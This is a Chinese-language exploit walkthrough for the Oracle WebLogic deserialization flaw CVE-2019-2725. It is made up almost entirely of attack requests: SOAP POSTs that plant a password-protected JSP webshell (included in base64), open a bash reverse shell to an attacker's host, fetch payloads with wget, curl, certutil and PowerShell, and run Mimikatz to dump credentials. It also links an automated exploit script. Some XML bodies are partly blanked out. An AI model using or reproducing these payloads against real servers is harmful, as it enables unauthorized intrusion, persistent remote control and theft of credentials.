012-CVE-2019-2725（CNVD-C-2019-48814）Weblogic反序列化远程代码执行漏洞-棉花糖会员站

# CVE-2019-2725（CNVD-C-2019-48814）Weblogic反序列化远程代码执行漏洞

### 一、漏洞简介

### 二、漏洞影响

Oracle WebLogic Server 10.x

Oracle WebLogic Server 12.1.3

### 三、复现过程

访问`http://url/_async/AsyncResponseService`

![](/static/lingzu/images/15893774295302.png)

若出现以上情况，则有可能会存在漏洞。

**Win/Linux 通用写入shell代码（一）**

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xxxx
“`

执行完之后访问

“`bash
http://url/_async/webshell.jsp?pwd=123&cmd=whoami
“`

**Win/Linux 通用写入shell代码（二）**

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1136
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xxxx
“`

执行完之后访问

“`bash
http://url/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
“`

(注：上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/，servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ 均为默认路径，如果路径修改，可以配合反弹shell进行获取)

**Linux**

反弹shell

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

/bin/bash

-c

bash -i >& /dev/tcp/vpsip/vpsport 0>&1

“`

写入webshell（需要公网） //这里提供两个代码

需要自己在公网上放置一个webshell.txt

webshell地址：`http://url/_async/webshell.jsp`

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

/bin/bash

-c

wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

“`

xx
xx

/bin/bash

-c

curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

“`

写入webshell（无需公网） //这里提供两个代码

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1378
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

/bin/bash

-c

echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

“`

写入的webshell地址为：`http://url/_async/webshell.jsp?pwd=123&cmd=whoami`

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1376
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

写入的webshell地址为：`http://url/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami`

**Win**

反弹shell

可直接使用CobaltStrike生成一个payload.ps1 powershell脚本，将该脚本放到公网上，然后使用如下报文即可

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

cmd

/c

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://ip:port/payload.ps1’); Invoke-Mimikatz -DumpCreds”

“`

写入webshell（需要公网） //这里提供两个代码

需要自己在公网上放置一个webshell.txt

webshell地址为：`http://url/_async/webshell.jsp`

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

cmd

/c

powershell (new-object System.Net.WebClient).DownloadFile( ‘http://ip:port/webshell.txt’,’servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp’)

“`

xx
xx

cmd

/c

certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp

“`

写入webshell （无需公网） //这里提供四个代码

前两组代码

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

cmd

/c

echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= > servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt

“`

“`bash
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx

cmd

/c

certutil -decode servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.jsp

“`

这两组代码的webshell地址为：`http://url/_async/webshell.jsp?pwd=123&cmd=whoami`

后两组代码

xx
xx

cmd

/c

echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt

“`

xx
xx

cmd

/c

certutil -decode servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp

“`

这两组代码的webshell地址为：`http://url/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami`

自动化脚本

https://github.com/ianxtianxt/CVE-2019-2725

“`bash
cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 “cat /etc/passwd”
“`

参考链接

https://mp.weixin.qq.com/s?__biz=MzA3NjU5MTIxMg==&mid=2650560530&idx=1&sn=86f5e0811c003c71965a4fc088f18100&chksm=87560111b02188071b9a60a36316b931770b0ed58b02b63d2d2428a5120d6809030d94031589&scene=21#wechat_redirect

文章版权归作者所有，未经允许请勿转载。

THE END